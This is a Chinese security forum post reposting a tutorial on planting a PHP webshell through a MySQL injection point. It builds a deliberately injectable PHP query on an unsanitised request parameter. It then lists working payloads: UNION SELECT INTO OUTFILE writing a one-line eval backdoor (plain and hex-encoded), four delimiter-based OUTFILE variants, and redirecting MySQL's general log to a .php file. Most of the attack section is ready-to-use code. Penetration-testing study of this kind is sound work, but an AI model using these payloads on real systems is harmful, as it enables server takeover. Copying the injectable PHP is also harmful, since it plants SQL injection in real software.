安全矩阵

 找回密码
 立即注册
搜索
查看: 4587|回复: 0

MySQL注入点写入WebShell的几种方式

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-4-16 16:40:14 | 显示全部楼层 |阅读模式
原文链接:MySQL注入点写入WebShell的几种方式

在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。
比如:当面对一个MySQL注入点,通过使用SQLmap的--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。
一个MySQL注入点写入Webshell,需要满足哪些条件呢?简单来说,需要了解secure_file_priv是否支持数据导出、还有当前数据库用户权限,当然,root用户数据库的全部权限,但写入Webshell 并不需要一定是root用户。
接下来,本文将通过构造一个注入点,分享几种Webshell写入的技巧。

0x01 构造一个注入点
1、在默认数据库test中创建测试表admin和测试数据,新建test用户授予FILE权限。
  1. create user 'test'@'localhost' identified by '123456';
  2. grant file on *.* to 'test'@'localhost';
复制代码
2、使用test用户连接数据库。
  1. <?php
  2. $con = mysql_connect("localhost","test","123456");
  3. mysql_select_db("test", $con);
  4. $id = $_REQUEST[ 'id' ];
  5. $query  = "SELECT * FROM test.admin WHERE id = $id ";
  6. $result = mysql_query($query);
  7. ......
复制代码

0x02 写入WebShell的几种方式
1、利用Union select 写入
这是最常见的写入方式,union 跟select into outfile,将一句话写入evil.php,仅适用于联合注入。
具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。
  1. ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'
  2. ?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "E:/study/WWW/evil.php"
复制代码

2、利用分隔符写入
当Mysql注入点为盲注或报错,Union select写入的方式显然是利用不了的,那么可以通过分隔符写入。SQLMAP的 --os-shell命令,所采用的就是一下这种方式。
具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。
  1. ?id=1 LIMIT 0,1 INTO OUTFILE 'E:/study/WWW/evil.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 --
复制代码
同样的技巧,一共有四种形式:
  1. ?id=1 INTO OUTFILE '物理路径' lines terminated by  (一句话hex编码)#
  2. ?id=1 INTO OUTFILE '物理路径' fields terminated by (一句话hex编码)#
  3. ?id=1 INTO OUTFILE '物理路径' columns terminated by (一句话hex编码)#
  4. ?id=1 INTO OUTFILE '物理路径' lines starting by    (一句话hex编码)#
复制代码

3、利用log写入
新版本的MySQL设置了导出文件的路径,很难在获取Webshell过程中去修改配置文件,无法通过使用select into outfile来写入一句话。这时,我们可以通过修改MySQL的log文件来获取Webshell。
具体权限要求:数据库用户需具备Super和File服务器权限、获取物理路径。
  1. show variables like '%general%';             #查看配置
  2. set global general_log = on;                 #开启general log模式
  3. set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址
  4. select '<?php eval($_GET[g]);?>'             #写入shell
  5. set global general_log=off;                  #关闭general log模式
复制代码






回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-19 08:58 , Processed in 0.012631 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表